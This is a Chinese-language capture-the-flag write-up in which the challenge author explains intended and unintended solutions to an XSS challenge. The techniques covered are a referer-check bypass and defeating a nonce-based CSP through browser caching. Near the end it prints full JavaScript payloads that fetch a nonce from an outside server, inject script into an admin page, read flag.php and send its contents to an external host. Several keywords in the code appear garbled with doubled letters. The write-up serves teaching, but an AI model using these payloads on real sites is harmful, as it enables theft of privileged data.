wnhub 絕對防御 出題思路和反思。由于整個站最初的時候其實是用來測試漏洞的，所以被改成題目的時候很多應該注意的地方沒有仔細推敲，在看了別人wp后仔細研究了一下，我發現題目本身漏洞就要求admin和xss點在同源下，整個漏洞被改成ctf題目是存在沖突的，再加上flag所在的地方使用了referer check本身就有問題，導致題目有了很多非預期解法，深感抱歉。

下面就完整的整理一下wp和所有的非預期攻擊方式

初逛站里面什么都沒有，聊天版的地方存在基本的xss，復寫就能繞過，但有 簡單的csp，允許unsafa-inline，session是httponly的，復寫構造xss讀admin頁面的消息(讓admin去請求api)

獲取頁面內容后，得到了后面站的地址，打開看看返回是這樣的

Wow, good guys,maybe you want /adminshigesha233e3333/#admin

再看看flag.php

hello, hacker, only admin can see it

只有管理員才能看，這里如果在user.php構造xss去讀flag的內容的話，會得到我的提示

nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

這里的提示本來意思是只有在admin目錄下才能讀到flag.php的內容，但是沒想到有一些人，在這里去日了我的判斷，而不是構造別的xss。

事實證明referer check不可取，切記切記

這位大佬就是攻擊了我的referer check，藍貓也是類似的方式

https://pwnhub.cn/media/writeup/121/79edbf2c-75da-48bb-8f5d-563d0048849b_b8b69656.pdf

下面我們回歸到正確的攻擊思路上去。

我們發現index.php是存在xss的樣子，但是后臺開啟了csp

這是一個比較特別的nonce script csp，屬于新型的csp，每次請求服務器都會更換新的字符串，如果字符串不匹配，那么腳本就會被攔截。(后面我會再發文章講這個CSP的攻擊方式)

我不知道盲測這個漏洞是怎么測試的，但你可能需要一篇文章

xss.html" data-ke-src="http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html" target="_blank">http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html

文章中提到了一點，如果瀏覽器并沒有請求后臺，那么csp就不會刷新，那么怎么才能讓它不刷新呢?瀏覽器緩存!

當服務端做出一部分配置的之后，如果頁面內容不涉及到后臺(僅涉及到前臺的變化)，那么瀏覽器就會從緩存中加載內容。

具體瀏覽器緩存的機制就不多解釋了，我們發現后臺開啟了緩存機制，雖然只有30s，但是已然足夠了。

這里其實思路就呼之欲出了，先iframe請求一次，然后解出nonce的值，添加到script的屬性中，執行任意xss。

由于沒有同源策略的攔截，所以出現了很多問題，類似于wupco的payload，但小m的和cola的是正解。

https://pwnhub.cn/media/writeup/123/909db9f9-1bb4-4c5b-a697-b0fa223ed376_a599515c.pdf

下面貼出，跨域情況下的處理方式以及payload，也是我出題的初衷。

根據前面文章中的poc，我們重新梳理試圖讀取flag.php的流程。

1、向admin發送payload，admin頁面需要打開一個iframe目標為后臺并輸入一個form，用textrea吃掉頁面內容

由于我們需要接收到這部分信息，而且后臺開啟csp，無法發送跨域請求，所以在自己服務器構造nonce.php文件解析請求，返回nonce字符串。(nonce.php必須保證保存字符串，在之后的請求中返回，在原poc中，這里是通過session保留的，但是我在實際測試的時候遇到了問題，我改成了文件儲存)

2、我們需要不斷請求nonce.php，并點擊提交按鈕，當返回有內容的時候，開啟新的iframe標簽，插入script標簽，讀取flag.php，以跳轉的方式傳出。

functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/admin/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

{C}

由于xhr需要跨域請求nonce.php，而前臺的站中含有csp，這是一個預設的坑，細心的人不難發現，用戶的信息是通過請求api/getmessage.php獲取的

我們可以注意這個頁面并沒有csp，所以構造跳轉到getmessage.php，然后服務端設置 header("Access-Control-Allow-Origin:*"); ，成功繞過

全部payload如下

if(locatioonn.pathname != "/api/getmessage.php"){ window.locatioonn.href = "http://" + document.domain + "/api/getmessage.php" } functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/adminshigesha233e3333/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

但事實上，題目有個非常有趣的非預期漏洞。

如果你注意觀察admin目錄的index.php頁面

xss點和script標簽在同一行，所以就有了一個新的問題，如果我們構造一個

<script>  標簽，然后沒有閉合，就可以吃掉后面的標簽，把后面script標簽的屬性保留

最后貼下virink的wp

https://pwnhub.cn/media/writeup/119/45db4b4d-53dc-47de-afe8-e821bd070dfa_7032e508.pdf

這次的非預期問題實在抱歉，下次出題一定仔細思考下漏洞的流程和問題，還是太菜了Orz

</script>